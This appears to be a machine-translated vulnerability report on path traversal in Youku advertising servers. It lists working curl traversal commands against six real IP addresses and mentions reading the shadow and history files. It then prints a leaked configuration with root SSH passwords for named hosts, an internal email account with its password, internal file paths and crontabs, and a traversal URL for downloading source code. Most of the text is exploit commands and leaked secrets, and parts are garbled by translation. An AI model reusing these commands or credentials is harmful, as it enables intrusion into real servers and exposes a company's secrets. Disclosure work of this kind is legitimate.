Youku Server File Reading

Youku Server File Reading

Youku Server File Reading and internal information leakage

There are problems with several servers in the advertising system. Attackers can read arbitrary files and have the root permission.
 

The following are the problematic servers.
 

curl http://220.181.185.228/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1curl http://220.181.185.229/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1curl http://220.181.154.180/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1curl http://220.181.154.181/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1curl http://220.181.154.202/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1curl http://220.181.154.203/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1

 

 

Take one of them as an example.

Read shadow
 

Read history
 

Reading various configuration files through history
 

 

#-*-Coding: UTF-8-*-[auctionserver_default] # Install the root directory rundir =/opt/workspace/exchange1.2/auctionserver # mode (prod/dev) mode = "prod" # Number of verticle accepted requests mainCore = 8 # Number of verticle connected to dsp beaconCore = 8 # Domain Name of the auction server, server hosts = ["c.miaozhen.atm.youku.com ", "B .miaozhen.atm.youku.com"] # port of the auction Server = 80 # port of the API opened to the Exchange website apiPort = 8080 # default exposure monitoring address impAddr =" http://n.miaozhen.atm.youku.com/x.gif "# Default clickmonitor address clickAddr =" http://n.miaozhen.atm.youku.com/r.gif "# KeymzCookieName =" _ ysuid "# size of the DSP connection pool because multiple beacon, in fact, it is multiplied by the number of beacon clientPoolSize = 100 # Maximum length of the HTTP pipeline queue clientMaxPipelineSize = 200 clientConnectionTimeout = 300 serverIdleTimeout = 700 # whether service fee is required needservicetimeout = "false" # special request "miaozhen1234" isNoticeInPm = "true" # check domain, priority is given to isCheckDomain = "true" isCheckHost = "false" isCheckToken = "false" token = "testToken" # isYouku = "true" useIPsClient = "true ""# dmpisDMP =" false "dmpHost =" 127.0.0.1 "dmpPort = 6379 dmpKey =" YK _ "dmpSep = ", "# Exchange website address websiteHost =" ingress "websitePort = 80 websiteIps = [" 220.181.154.177 "," 123.126.99.87 "," 10.103.20.174 "] websiteHeaderHost =" ingress "# registration interface, you do not need to modify registerApi = "/server/api/addAuction" # budget request interface, you do not need to modify budgetApi = "/pull/api/budget/take" # address of the Redis output from the auction log, default local redisHost = "127.0.0.1" redisPort = 6379 keyBudget = "exchange_auction_budget_backup" # auctionDataDir = "/opt/data/backup/exchange1.2/auctionserver" # Whether to display system logs isShowLog = "true" # Log Retention days logReservedDays = 30 days = "" budgetPort = 8281 budgetHost = "Hangzhou" mappingDmpPort = 6380 mappingDmpHost = "" mappingDspQps = 1 mappingDspUrl = "" mappingDspId =" "" forwardPath = "/" forwardPort = 1234 forwardHost = "127.0.0.1" isForward = "false" heapSize = 10 # start and Stop scripts start = bash bin/start. shstop = bash bin/stop. shcheck = bash bin/check. shrestart = bash bin/restart. shstart_retry = bash bin/start_retry.shstop_retry = bash bin/stop_retry.shbackup = bash bin/backup. sh # Install the target machine password # sshpass = "123456" # Install the target machine port sshport = "1111" [auctionserver_01] # Install the target machine user and domain name (ip) node = root@220.181.154.180sshpass = "ocf (* XzhWt4K" # Name of the auction server serverName = "a05.exchange. ad. b28.youku "[auctionserver_02] # target machine User Installed and domain name (ip) node = root@220.181.154.181sshpass =" isC * & 7 cjpZCW "# Name of the auction server serverName =" a06.exchange. ad. b28.youku "# [auctionserver_03] # installed target machine user and domain name (ip) # node = root@220.181.154.183 # sshpass = "wzxJ ^ # jsQJKv" # Name of the auction server # serverName = "a08.exchange. ad. b28.youku"

List several key file addresses.
 

/opt/workspace/exchange1.2/reportserver/run/start.sh/opt/workspace/exchange1.2/reportserver/code/CMakeLists.txt /opt/workspace/exchange1.2/reportserver/config/mergelog.list/opt/workspace/exchange1.2/reportserver/config/reportserver.cfg/opt/workspace/exchange1.2/auctionserver/conf/exchange_auction_youku_new_config.ini/opt/workspace/exchange1.2/auctionserver/conf/exchange_auction_youku_config.ini/opt/workspace/exchange1.2/auctionserver/conf/dsps.txt /home/zczhao/warn/sendlog.perl/opt/workspace/exchange1.2/thirdparts/redis-2.4.17/redis.conf/home/zczhao/cron/reporttab0 2 * * * /home/zczhao/clear/clear_log.sh0 2 * * * /home/zczhao/clear/clear_bz2.sh0 2 * * * /home/zczhao/clear/bz2_day.sh >> /home/zczhao/clear/history.log#*/10 * * * * /home/zczhao/warn/disk_warn.sh*/10 * * * * bash /opt/workspace/exchange1.2/auctionserver/bin/run_dnscache.sh*/10 * * * * bash /opt/workspace/exchange1.2/auctionserver/bin/heartbeat_check.sh*/10 * * * * bash /opt/workspace/exchange1.2/auctionserver/bin/jmap.sh/opt/data/backup/exchange1.2/reportserver/auction/log/bz2.sh

Sendlog. perl has an internal email account.

my $mail_smtp    = 'mail.youku.com';my $mail_from    = 'systeminformation@youku.com';my $mail_to      = 'dawei.zhang@youku.com';my $auth_id      = 'systeminformation';my $auth_passwd  = '111aaaAAA';my $subject      = "Warn from adExchange13 ($date).";my $body         = `cat /home/zczhao/warn/warn_log`;

 

By the way, you can also download the source code.

Http: // 220.181.185.228/.../../opt/workspace/exchange1.2/auctionserver.2014-07-16-07-52-30.tar.gz
 

Solution:

Enhanced Filtering